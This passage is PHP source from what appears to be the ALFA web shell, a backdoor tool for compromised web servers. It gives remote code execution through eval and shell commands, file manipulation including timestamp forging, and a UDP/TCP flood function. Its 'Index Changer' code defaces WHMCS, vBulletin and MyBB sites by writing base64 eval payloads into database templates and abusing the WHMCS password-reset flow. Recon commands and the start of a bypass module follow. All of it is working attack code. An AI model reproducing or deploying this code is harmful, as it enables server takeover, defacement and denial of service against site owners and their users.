false;\r\nif($chdir_fals&&$alfa_canruncmd){\r\nif(_alfa_is_writable($_POST[\'alfa1\'])){\r\n$alfa1_escape = addslashes($alfa1_decoded);\r\nalfaEx("cd \'".addslashes($_POST[\'c\'])."\';mv \'".$alfa1_escape."\' \'".addslashes($_POST[\'alfa3\'])."\'");\r\n}else{\r\n$cmd_rename = true;\r\n}\r\n}else{\r\n$alfa1_escape = addslashes($_POST["alfa1"]);\r\n}\r\nif(!@rename($_POST[\'alfa1\'], $_POST[\'alfa3\'])&&$cmd_rename){\r\necho \'Can\\\'t rename!<br>\';}else{echo(\'Renamed!<script>try{$("\'.$_POST[\'alfa4\'].\'").innerHTML = "<div class=\\\'editor-icon\\\'>"+loadType(\\\'\'.$alfa3_escape.\'\\\',\\\'\'.$ftype.\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\')+"</div><div class=\\\'editor-file-name\\\'>\'.$alfa3_escape.\'</div>";editor_files["\'.$_POST[\'alfa4\'].\'"].file = "\'.$alfa3_escape.\'";updateFileEditor("\'.$alfa1_escape.\'", "\'.$alfa3_escape.\'");\'.($ftype == "dir"?"updateDirsEditor(\'".$_POST[\'alfa4\']."\',\'".$alfa1_escape."\');":"").\'}catch(e){console.log(e)}</script>\');$alfa1_escape = $alfa3_escape;}\r\n}\r\necho \'<form onsubmit="editor(\\\'\'.$alfa1_escape.\'\\\',\\\'\'.$_POST[\'alfa2\'].\'\\\',this.name.value,\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\');return false;"><input type="text" name="name" value="\'.addslashes(htmlspecialchars(isset($_POST[\'alfa3\'])&&$_POST[\'alfa3\']!=\'\'?$_POST[\'alfa3\']:$alfa1_decoded)).\'"><input type=submit value=" "></form>\';\r\nbreak;\r\ncase \'touch\':\r\n@chdir($_POST[\'c\']);\r\nif( !empty($_POST[\'alfa3\']) ) {\r\n$time = strtotime($_POST[\'alfa3\']);\r\nif($time){\r\n$touched = false;\r\nif($chdir_fals&&$alfa_canruncmd){\r\n\talfaEx("cd \'".addslashes($_POST["c"])."\';touch -d \'".htmlspecialchars(addslashes($_POST[\'alfa3\']))."\' \'".addslashes($alfa1_decoded)."\'");\r\n\t$touched = true;\r\n}\r\nif(!@touch($_POST[\'alfa1\'],$time,$time)&&!$touched)\r\necho \'Fail!\';\r\nelse\r\necho \'Touched!\';\r\n} else echo \'Bad time format!\';\r\n}\r\nclearstatcache();\r\necho \'<script>alfa3_="";</script><form onsubmit="editor(\\\'\'.addslashes($_POST[\'alfa1\']).\'\\\',\\\'\'.$_POST[\'alfa2\'].\'\\\',this.touch.value,\\\'\'.$_POST[\'c\'].\'\\\',\\\'\'.$_POST[\'alfa4\'].\'\\\',\\\'\'.$ftype.\'\\\');return false;"><input type=text name=touch value="\'.date("Y-m-d H:i:s", ($chdir_fals?$file_info[4]:@filemtime($_POST[\'alfa1\']))).\'"><input type=submit value=" "></form>\';\r\nbreak;\r\ncase \'image\':\r\n@chdir($_POST[\'c\']);\r\necho(\'<hr>\');\r\n$file = $_POST[\'alfa1\'];\r\n$image_info = @getimagesize($file);\r\nif(is_array($image_info)||$chdir_fals){\r\n$width = (int)$image_info[0];\r\n$height = (int)$image_info[1];\r\nif($chdir_fals&&$alfa_canruncmd){\r\n\t$source = alfaEx("cat \'".addslashes($file)."\' | base64");\r\n\tlist($width, $height) = explode(":", alfaEx("identify -format \'%w:%h\' \'".addslashes($file)."\'"));\r\n\t$mime = explode(":", alfaEx("file --mime-type \'".addslashes($file)."\'"));\r\n\t$image_info[\'mime\'] = $mime[1];\r\n}else{\r\n\t$source = __ZW5jb2Rlcg(__read_file($file, false));\r\n}\r\n$image_info_h = "Image type = <span>[</span> ".$image_info[\'mime\']." <span>]</span><br>Image Size = <span>[ </span>".$width." x ".$height."<span> ]</span><br>";\r\nif($width > 800){$width = 800;}\r\necho $content = "<div class=\'editor-view\'><div class=\'view-content\'><center>".$image_info_h."<br><img id=\'viewImage\' style=\'max-width:100%;border:1px solid green;\' src=\'data:".$image_info[\'mime\'].";base64,".$source."\' alt=\'".$file."\'></center></div></div><br>";\r\n}\r\nbreak;\r\n}\r\necho \'</div>\';\r\nalfaFooter();\r\n}\r\nfunction findicon($file,$type){\r\n$s = \'http://solevisible.com/icons/\';\r\n$types = array(\'json\',\'ppt\',\'pptx\',\'xls\',\'xlsx\',\'msi\',\'config\',\'cgi\',\'pm\',\'c\',\'cpp\',\'cs\',\'java\',\'aspx\',\'asp\',\'db\',\'ttf\',\'eot\',\'woff\',\'woff2\',\'woff\',\'conf\',\'log\',\'apk\',\'cab\',\'bz2\',\'tgz\',\'dmg\',\'izo\',\'jar\',\'7z\',\'iso\',\'rar\',\'bat\',\'sh\',\'alfa\',\'gz\',\'tar\',\'php\',\'php4\',\'php5\',\'phtml\',\'html\',\'xhtml\',\'shtml\',\'htm\',\'zip\',\'png\',\'jpg\',\'jpeg\',\'gif\',\'bmp\',\'ico\',\'txt\',\'js\',\'rb\',\'py\',\'xml\',\'css\',\'sql\',\'htaccess\',\'pl\',\'ini\',\'dll\',\'exe\',\'mp3\',\'mp4\',\'m4a\',\'mov\',\'flv\',\'swf\',\'mkv\',\'avi\',\'wmv\',\'mpg\',\'mpeg\',\'dat\',\'pdf\',\'3gp\',\'doc\',\'docx\',\'docm\');\r\nif($type!=\'file\'){\r\nreturn ($file==\'..\'?$s.\'back.png\':$s.\'folder.png\');\r\n}else{\r\n$ext = explode(\'.\',$file);\r\n$ext = end($ext);\r\n$ext = strtolower($ext);\r\nreturn (in_array($ext,$types)?$s.$ext.\'.png\':$s.\'notfound.png\');\r\n}\r\n}\r\nfunction alfadlfile(){\r\nif(isset($_POST[\'c\'],$_POST[\'file\'])){\r\n$basename = rawurldecode(basename($_POST[\'file\']));\r\n$_POST[\'file\'] = str_replace("//", "/", $_POST[\'c\'].\'/\'.$basename);\r\n$alfa_canruncmd = _alfa_can_runCommand(true,true);\r\nif(@is_file($_POST[\'file\']) && @is_readable($_POST[\'file\']) || $alfa_canruncmd){\r\nob_start("ob_gzhandler", 4096);\r\nheader("Content-Disposition: attachment; filename=\\"".addslashes($basename)."\\"");\r\nheader("Content-Type: application/octet-stream");\r\nif($GLOBALS["glob_chdir_false"]){\r\n\t$randname = $basename.rand(111,9999);\r\n\t$scriptpath = dirname($_SERVER["SCRIPT_FILENAME"]);\r\n\t$filepath = $scriptpath."/".$randname;\r\n\tif(_alfa_is_writable($scriptpath)){\r\n\t\talfaEx("cp \'".addslashes($_POST["file"])."\' \'".addslashes($filepath)."\'");\r\n\t\treadfile($filepath);\r\n\t\t@unlink($filepath);\r\n\t}else{\r\n\t\talfaEx("cat \'".addslashes($_POST["file"])."\'");\r\n\t}\r\n}else{\r\n\treadfile($_POST[\'file\']);\r\n}\r\n}else echo(\'Error...!\');}}\r\nfunction __alfa_set_cookie($key, $value){\r\n\t$_COOKIE[$key] = $value;\r\n\t@setcookie($key, $value, time()+(86400 * 7), \'/\');\r\n}\r\nfunction alfaphpeval(){\r\nif(isset($_COOKIE["eval_tmpdir"])&&@is_dir($_COOKIE["eval_tmpdir"])){\r\n\t$tempdir = __ZGVjb2Rlcg($_COOKIE["eval_tmpdir"]);\r\n}else{\r\n\t$tempdir = dirname(alfaEx("mktemp"));\r\n\t__alfa_set_cookie("eval_tmpdir", __ZW5jb2Rlcg($tempdir));\r\n}\r\nalfahead();\r\nif(isset($_POST[\'alfa2\']) && ($_POST[\'alfa2\'] == \'ini\')){\r\necho \'<div class=header>\';\r\nob_start();\r\n$INI=ini_get_all();\r\nprint \'<table border=0><tr>\'\r\n.\'<td class="listing"><font class="highlight_txt">Param</td>\'\r\n.\'<td class="listing"><font class="highlight_txt">Global value</td>\'\r\n.\'<td class="listing"><font class="highlight_txt">Local Value</td>\'\r\n.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';\r\nforeach ($INI as $param => $values)\r\nprint "\\n".\'<tr>\'\r\n.\'<td class="listing"><b>\'.$param.\'</td>\'\r\n.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\'\r\n.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\'\r\n.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';\r\n$tmp = ob_get_clean();\r\n$tmp = preg_replace(\'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\'\',$tmp);\r\n$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\necho str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\';\r\n}\r\nif(isset($_POST[\'alfa2\']) && ($_POST[\'alfa2\'] == \'info\')) {\r\necho \'<div class=header><style>.p {color:#000;}</style>\';\r\nob_start();\r\nphpinfo();\r\n$tmp = ob_get_clean();\r\n$tmp = preg_replace(\'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\'\',$tmp);\r\n$tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp);\r\necho str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\';\r\n}\r\nif(isset($_POST[\'alfa2\']) && ($_POST[\'alfa2\'] == \'exten\')) {\r\necho \'<div class=header>\';\r\nob_start();\r\n$EXT=get_loaded_extensions();\r\necho \'<table border=0><tr><td class="listing">\'.implode(\'</td></tr>\'."\\n".\'<tr><td class="listing">\', $EXT).\'</td></tr></table>\'.count($EXT).\' extensions loaded\';\r\necho \'</div><br>\';\r\n}\r\n$lang_html = "";\r\nforeach(array("php"=>"php ~> [ Windows / Linux ]","perl"=>"perl ~> [ Linux ]","python"=>"python ~> [ Linux ]","bash"=>"bash ~> [ Linux ]") as $key=>$val){$lang_html .= \'<option value="\'.$key.\'" \'.($_POST["alfa3"]==$key?"selected":"").\'>\'.$val.\'</option>\';}\r\necho \'<div class=header><Center><a href=javascript:void(0) onclick="g(\\\'phpeval\\\',null,\\\'\\\',\\\'ini\\\')">| INI_INFO | </a><a href=javascript:void(0) onclick="g(\\\'phpeval\\\',null,\\\'\\\',\\\'info\\\')"> | phpinfo |</a><a href=javascript:void(0) onclick="g(\\\'phpeval\\\',null,\\\'\\\',\\\'exten\\\')"> | extensions |</a></center><br><form class="php-evals" name="pf" method="post" onsubmit="var ace_value=geEvalAceValue(this);g(\\\'phpeval\\\',null,ace_value,null,this.language.value); return false;"><div class="txtfont">Select Language: </div> <select name="language" style="width:300px;">\'.$lang_html.\'</select>\'._alfa_load_ace_options("eval").\'<br><br><div class="bigarea" style="position:relative;"><div class="php-evals-ace">\'.(!empty($_POST[\'alfa1\'])?htmlspecialchars($_POST[\'alfa1\']):"&lt;?php\\n\\n\\techo(\'hello alfa !\');\\n\\n?>").\'</div></div><center><input type="submit" value="" style="margin-top:5px"></center>\';\r\necho \'</form><pre id="PhpOutput" style="\'.(empty($_POST[\'alfa1\'])?\'display:none;\':\'\').\'margin-top:5px;" class="ml1">\';\r\nif(!empty($_POST[\'alfa1\'])){\r\nif($_POST[\'alfa3\']=="php"){\r\nob_start();\r\neval(\'?>\'.$_POST[\'alfa1\']);\r\n$result = htmlspecialchars(ob_get_clean());\r\n}elseif(_alfa_can_runCommand()&&$GLOBALS["sys"]=="unix"){\r\n\t$lang = $_POST[\'alfa3\'];\r\n\t$filename = "temp".rand(11111,99999);\r\n\t$temp = $tempdir."/".$filename ;\r\n\t__write_file($filename, $_POST[\'alfa1\']);\r\n\t$result = alfaEx("mv {$filename} {$temp};{$lang} {$temp};rm -f {$temp}");\r\n\t@unlink($filename);\r\n\t@unlink($temp);\r\n}\r\necho \'<textarea class="bigarea">\'.$result.\'</textarea>\';\r\n}\r\necho \'</pre></div>\';\r\nalfafooter();\r\n}\r\nfunction alfahash(){\r\nif(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\nif(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}\r\n$stringTools = array(\r\n\'Base64_encode ( $string )\' => \'__ZW5jb2Rlcg($s)\',\r\n\'Base64_decode ( $string )\' => \'__ZGVjb2Rlcg($s)\',\r\n\'strrev ( $string )\' => \'strrev($s)\',\r\n\'bin2hex ( $string )\' => \'bin2hex($s)\',\r\n\'hex2bin ( $string )\' => \'hex2bin($s)\',\r\n\'md5 ( $string )\' => \'md5($s)\',\r\n\'sha1 ( $string )\' => \'sha1($s)\',\r\n\'hash ( "sha251", $string ) --> sha251\' => \'hash("sha256",$s)\',\r\n\'hash ( "sha384", $string ) --> sha384\' => \'hash("sha384",$s)\',\r\n\'hash ( "sha512", $string ) --> sha512\' => \'hash("sha512",$s)\',\r\n\'crypt ( $string )\' => \'crypt($s)\',\r\n\'crc32 ( $string )\' => \'crc32($s)\',\r\n\'str_rot13 ( $string )\' => \'str_rot13($s)\',\r\n\'urlencode ( $string )\' => \'urlencode($s)\',\r\n\'urldecode  ( $string )\' => \'urldecode($s)\',\r\n\'full_urlencode  ( $string )\' => \'full_urlencode($s)\',\r\n\'htmlspecialchars  ( $string )\' => \'htmlspecialchars($s)\',\r\n\'base64_encode (gzdeflate( $string , 9)) --> Encode\' => \'__ZW5jb2Rlcg(gzdeflate($s, 9))\',\r\n\'gzinflate (base64_decode( $string )) --> Decode\' => \'@gzinflate(__ZGVjb2Rlcg($s))\',\r\n\'str_rot13 (base64_encode( $string )) --> Encode\' => \'str_rot13(__ZW5jb2Rlcg($s))\',\r\n\'base64_decode (str_rot13( $string )) --> Decode\' => \'__ZGVjb2Rlcg(str_rot13($s))\',\r\n\'str_rot13 (base64_encode(gzdeflate( $string , 9))) --> Encode\' => \'str_rot13(__ZW5jb2Rlcg(gzdeflate($s,9)))\',\r\n\'gzinflate (base64_decode(str_rot13( $string ))) --> Decode\' => \'@gzinflate(__ZGVjb2Rlcg(str_rot13($s)))\',\r\n);\r\nalfahead();\r\necho \'<div class=header>\';\r\necho "<form onSubmit=\'g(\\"hash\\",null,this.selectTool.value,this.input.value);return false;\'><div class=\'txtfont\'>Method:</div> <select name=\'selectTool\' style=\'width:400px;\'>";\r\nforeach($stringTools as $k => $v)\r\necho "<option value=\'".htmlspecialchars($v)."\' ".($_POST[\'alfa1\']==$v?\'selected\':\'\').">".$k."</option>";\r\necho "</select> <input type=\'submit\' value=\' \'/><br><textarea  name=\'input\' style=\'margin-top:5px\' class=\'bigarea\'>".(empty($_POST[\'alfa1\'])?\'\':htmlspecialchars(@$_POST[\'alfa2\']))."</textarea></form>";\r\nif(!empty($_POST[\'alfa1\'])){\r\n$string = addslashes($_POST[\'alfa2\']);\r\n$string = str_replace(\'\\"\',\'"\',$string);\r\n$alg = $_POST[\'alfa1\'];\r\n$code = str_replace(\'$s\',"\'".$string."\'",$alg);\r\nob_start();\r\neval(\'echo \'.$code.\';\');\r\n$res = ob_get_contents();\r\nob_end_clean();\r\nif(in_array($alg, $stringTools))echo \'<textarea class="bigarea">\'.htmlspecialchars($res).\'</textarea>\';\r\n}\r\necho "</div>";\r\nalfaFooter();\r\n}\r\nfunction alfados(){\r\nalfahead();\r\necho \'<div class=header>\';\r\necho \'<center><p><div class="txtfont_header">| DOS |</div></p><form onSubmit="g(\\\'dos\\\',null,this.host.value,this.time.value,this.port.value,this.m.value); return false;"><div class="txtfont">Method : <select name="m" style="width:80px;"><option value="udp">UDP</option><option value="tcp">TCP</option></select> Host : <input name="host" type="text" value="localhost" size="25" /> Time : <input name="time" type="text" size="15" /> Port : <input name="port" type="text" size="10" /> <input type="submit" value=" " /></div></form></center><br>\';\r\nif(!empty($_POST[\'alfa1\']) && !empty($_POST[\'alfa2\']) && !empty($_POST[\'alfa3\'])){\r\necho __pre();\r\n$packets=0;\r\nignore_user_abort(true);\r\n$exec_time=(int)$_POST[\'alfa2\'];\r\n$time=time();\r\n$max_time=$exec_time+$time;\r\n$host=$_POST[\'alfa1\'];\r\n$port=(int)$_POST[\'alfa3\'];\r\n$method=$_POST[\'alfa4\'];\r\n$out = str_repeat(\'X\',65000);\r\nwhile(1){\r\n$packets++;\r\nif(time() > $max_time){\r\nbreak;\r\n}\r\n$fp = @fsockopen($method.\'://\'.$host, $port, $errno, $errstr, 5);\r\nif($fp){\r\nfwrite($fp, $out);\r\nfclose($fp);\r\n}\r\n}\r\necho "<center>$packets (" . @round(($packets*65)/1024, 2) . " MB) packets averaging ". @round($packets/$exec_time, 2) . " packets per second</center>";\r\necho "</pre>";\r\n}\r\necho \'</div>\';\r\nalfafooter();\r\n}\r\nfunction __pre(){return(\'<pre id="strOutput" style="margin-top:5px" class="ml1">\');}\r\nfunction alfaIndexChanger(){\r\nalfahead();\r\n\r\necho \'<div class=header><center><p><div class="txtfont_header">| Index Changer |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'IndexChanger\\\',null,null,null,\\\'whmcs\\\')">| Whmcs | </a><a href=javascript:void(0) onclick="g(\\\'IndexChanger\\\',null,\\\'vb\\\',null)">| vBulletin | </a><a href=javascript:void(0) onclick="g(\\\'IndexChanger\\\',null,null,\\\'mybb\\\')">| MyBB | </a></h3></center>\';\r\nif(isset($_POST[\'alfa3\'])&&($_POST[\'alfa3\'] == \'whmcs\')){\r\necho __pre();\r\n\r\necho "<center><center><div class=\'txtfont_header\'>| Whmcs |</div>\r\n<p><center>".getConfigHtml(\'whmcs\')."<form onSubmit=\\"g(\'IndexChanger\',null,null,null,\'whmcs\',this.fname.value,this.path.value,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value); return false;\\">\r\n";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'inputName\' => \'dbh\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'URL\', \'inputName\' => \'path\', \'inputValue\' => \'http://site.com/whmcs\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'File Name\', \'inputName\' => \'fname\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'inputName\' => \'dbn\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'inputName\' => \'dbu\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td6\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'inputName\' => \'dbp\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><div class=\'txtfont\'>| Your Index |</div><br>\r\n<textarea name=index rows=\'19\' cols=\'103\'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\r\n<input type=\'submit\' value=\' \'>\r\n</form></center></center>";\r\nif(isset($_POST[\'alfa6\'])){\r\n$s0levisible="Powered By Solevisible";\r\n$dbu = $_POST[\'alfa6\'];\r\n$path = $_POST[\'alfa5\'];\r\n$fname = $_POST[\'alfa4\'];\r\n$dbn = $_POST[\'alfa7\'];\r\n$dbp = $_POST[\'alfa8\'];\r\n$dbh = $_POST[\'alfa9\'];\r\n$index = $_POST[\'alfa10\'];\r\n$index = str_replace("\\\'","\'",$index);\r\n$deface = \'$x = base64_decode("\'.__ZW5jb2Rlcg($index).\'"); $solevisible = fopen("\'.$fname.\'","w"); fwrite($solevisible,$x);\';\r\n$saveData = __ZW5jb2Rlcg($deface);\r\n$Def = \'{php}eval(base64_decode("\'.$saveData.\'"));{/php}\';\r\nif(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){\r\n$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\r\n$soleSave=@mysqli_query($conn,"select message from tblemailtemplates where name=\'Password Reset Validation\'");\r\n$soleGet = mysqli_fetch_assoc($soleSave);\r\n$tempSave1 = $soleGet[\'message\'];\r\n$tempSave = str_replace("\'","\\\'",$tempSave1);\r\n$inject = "UPDATE tblemailtemplates SET message=\'$Def\' WHERE name=\'Password Reset Validation\'";\r\n$result=@mysqli_query($conn,$inject) or die (mysqli_error($conn));\r\n$create = "insert into tblclients (email) values(\'solevisible@fbi.gov\')";\r\n$result2 =@mysqli_query($conn,$create) or die (mysqli_error($conn));\r\nif(function_exists(\'curl_version\')){\r\n$AlfaSole = new AlfaCURL(true);\r\n$saveurl = $AlfaSole->Send($path."/pwreset.php");\r\n$getToken = preg_match("/name=\\"token\\" value=\\"(.*?)\\"/i",$saveurl,$token);\r\n$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");\r\n$backdata = "UPDATE tblemailtemplates SET message=\'{$tempSave}\' WHERE name=\'Password Reset Validation\'";\r\n$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));\r\n__alert(\'File Created...\');\r\necho "<br><pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><center><font color=red><a target=\'_blank\' href=\'".$path."/".$fname."\'>Click Here !</a></font></b></center><br><br>";\r\n}else{\r\necho "<br><pre id=\\"strOutput\\" style=\\"margin-top:5px\\" class=\\"ml1\\"><br><center><b><font color=\\"#FFFFFF\\">Please go to Target </font><font color=red>\\" ".$path."/pwreset.php \\"</font><br/><font color=\\"#FFFFFF\\"> and reset password with email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color=\\"#FFFFFF\\">and go to</font> <font color=red>\\" ".$path."/".$fname." \\"</font></b></center><br><br>";\r\n}}}}\r\nif(isset($_POST[\'alfa1\']) && ($_POST[\'alfa1\'] == \'vb\')){\r\necho __pre();\r\n\r\necho "<center><center><div class=\'txtfont_header\'>| vBulletin |</div>\r\n<p><center>".getConfigHtml(\'vb\')."<form onSubmit=\\"g(\'IndexChanger\',null,\'vb\',this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.index.value,this.prefix.value,\'>>\'); return false;\\">\r\n";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'inputName\' => \'dbh\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'inputName\' => \'dbn\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'inputName\' => \'dbu\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'inputName\' => \'dbp\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td5\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Prefix\', \'inputName\' => \'prefix\', \'id\' => \'db_prefix\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><div class=\'txtfont\'>| Your Index |</div><br>\r\n<textarea name=\'index\' rows=\'19\' cols=\'103\'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>\r\n<input type=\'submit\' value=\' \'></form></center></center>";\r\nif($_POST[\'alfa8\']==\'>>\'){\r\n$s0levisible="Powered By Solevisible";\r\n$dbu = $_POST[\'alfa2\'];\r\n$dbn = $_POST[\'alfa3\'];\r\n$dbp = $_POST[\'alfa4\'];\r\n$dbh = $_POST[\'alfa5\'];\r\n$index = $_POST[\'alfa6\'];\r\n$prefix = $_POST[\'alfa7\'];\r\n$index=str_replace("\\\'","\'",$index);\r\n$set_index = "{\\${eval(base64_decode(\\\'";\r\n$set_index .= __ZW5jb2Rlcg("echo \\"$index\\";");\r\n$set_index .= "\\\'))}}{\\${exit()}}";\r\nif(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){\r\n$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));\r\n$loli1 = "UPDATE ".$prefix."template SET template=\'".$set_index."".$s0levisible."\' WHERE title=\'spacer_open\'";\r\n$loli2 = "UPDATE ".$prefix."template SET template=\'".$set_index."".$s0levisible."\' WHERE title=\'FORUMHOME\'";\r\n$loli3 = "UPDATE ".$prefix."style SET css=\'".$set_index."".$s0levisible."\', stylevars=\'\', csscolors=\'\', editorstyles=\'\'";\r\n@mysqli_query($conn,$loli1) or die (mysqli_error($conn));\r\n@mysqli_query($conn,$loli2) or die (mysqli_error($conn));\r\n@mysqli_query($conn,$loli3) or die (mysqli_error($conn));\r\n__alert(\'VB index changed...!\');\r\n}\r\n}\r\n}\r\nif(isset($_POST[\'alfa2\']) && ($_POST[\'alfa2\'] == \'mybb\')) {\r\necho __pre();\r\n\r\necho "<center><center><div class=\'txtfont_header\'>| Mybb |</div>\r\n<p><center>".getConfigHtml(\'mybb\')."<form onSubmit=\\"g(\'IndexChanger\',null,\'null\',\'mybb\',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\\" method=POST action=\'\'>\r\n";\r\n$table = array(\'td1\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Mysql Host\', \'inputName\' => \'mybbdbh\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n \'td2\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Name\', \'inputName\' => \'mybbdbn\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td3\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db User\', \'inputName\' => \'mybbdbu\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n \'td4\' =>\r\n array(\'color\' => \'FFFFFF\', \'tdName\' => \'Db Pass\', \'inputName\' => \'mybbdbp\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho "<br><div class=\'txtfont\'>| Your Index |</div><br>\r\n<textarea name=mybbindex rows=\'19\' cols=\'103\'>\r\n<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type=\'submit\' value=\'\' ></p></form></center></center>";\r\nif(isset($_POST[\'alfa6\'])){\r\n$mybb_dbh = $_POST[\'alfa6\'];\r\n$mybb_dbu = $_POST[\'alfa7\'];\r\n$mybb_dbn = $_POST[\'alfa8\'];\r\n$mybb_dbp = $_POST[\'alfa9\'];\r\n$mybb_index = $_POST[\'alfa10\'];\r\nif(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){\r\n$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));\r\n$prefix="mybb_";\r\n$loli7 = "UPDATE ".$prefix."templates SET template=\'".$mybb_index."\' WHERE title=\'index\'";\r\n$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));\r\n__alert(\'MyBB index changed...!\');\r\n}\r\n}\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfaproc()\r\n{\r\nalfahead();\r\necho "<Div class=header><br><center>";\r\nif(empty($_POST[\'ajax\'])&&!empty($_POST[\'alfa1\']))\r\n$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\nif($GLOBALS[\'sys\']=="win"){\r\n$process=array(\r\n"Task List" =>"tasklist /V",\r\n"System Info" =>"systeminfo",\r\n"Active Connections" => "netstat -an",\r\n"Running Services" => "net start",\r\n"User Accounts" => "net user",\r\n"Show Computers" => "net view",\r\n"ARP Table" => "arp -a",\r\n"IP Configuration" => "ipconfig /all"\r\n);}else{\r\n$process=array(\r\n"Process status" => "ps aux",\r\n"Syslog" =>"cat /etc/syslog.conf",\r\n"Resolv" => "cat /etc/resolv.conf",\r\n"Hosts" =>"cat /etc/hosts",\r\n"Cpuinfo"=>"cat /proc/cpuinfo",\r\n"Version"=>"cat /proc/version",\r\n"Sbin"=>"ls -al /usr/sbin",\r\n"Interrupts"=>"cat /proc/interrupts",\r\n"lsattr"=>"lsattr -va",\r\n"Uptime"=>"uptime",\r\n"Fstab" =>"cat /etc/fstab"\r\n);}\r\nforeach($process as $n => $link){\r\necho \'<a href="javascript:void(0);" onclick="g(\\\'proc\\\',null,\\\'\'.$link.\'\\\')"> | \'.$n.\' | </a>\';\r\n}\r\necho "</center><br>";\r\nif(!empty($_POST[\'alfa1\'])){\r\necho "<pre class=\'ml1\' style=\'margin-top:5px\' >";\r\nif($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd \'".addslashes($_POST["c"])."\';";}\r\necho alfaEx($cmd.$_POST[\'alfa1\'], true);\r\necho \'</pre>\';\r\n}\r\necho "</div>";\r\nalfafooter();\r\n}\r\nfunction alfasafe(){\r\nalfahead();\r\necho "<div class=header><center><br><div class=\'txtfont_header\'>| Auto ByPasser |</div>";\r\necho \'<h3><a href=javascript:void(0) onclick="g(\\\'safe\\\',null,\\\'php.ini\\\',null)">| PHP.INI | 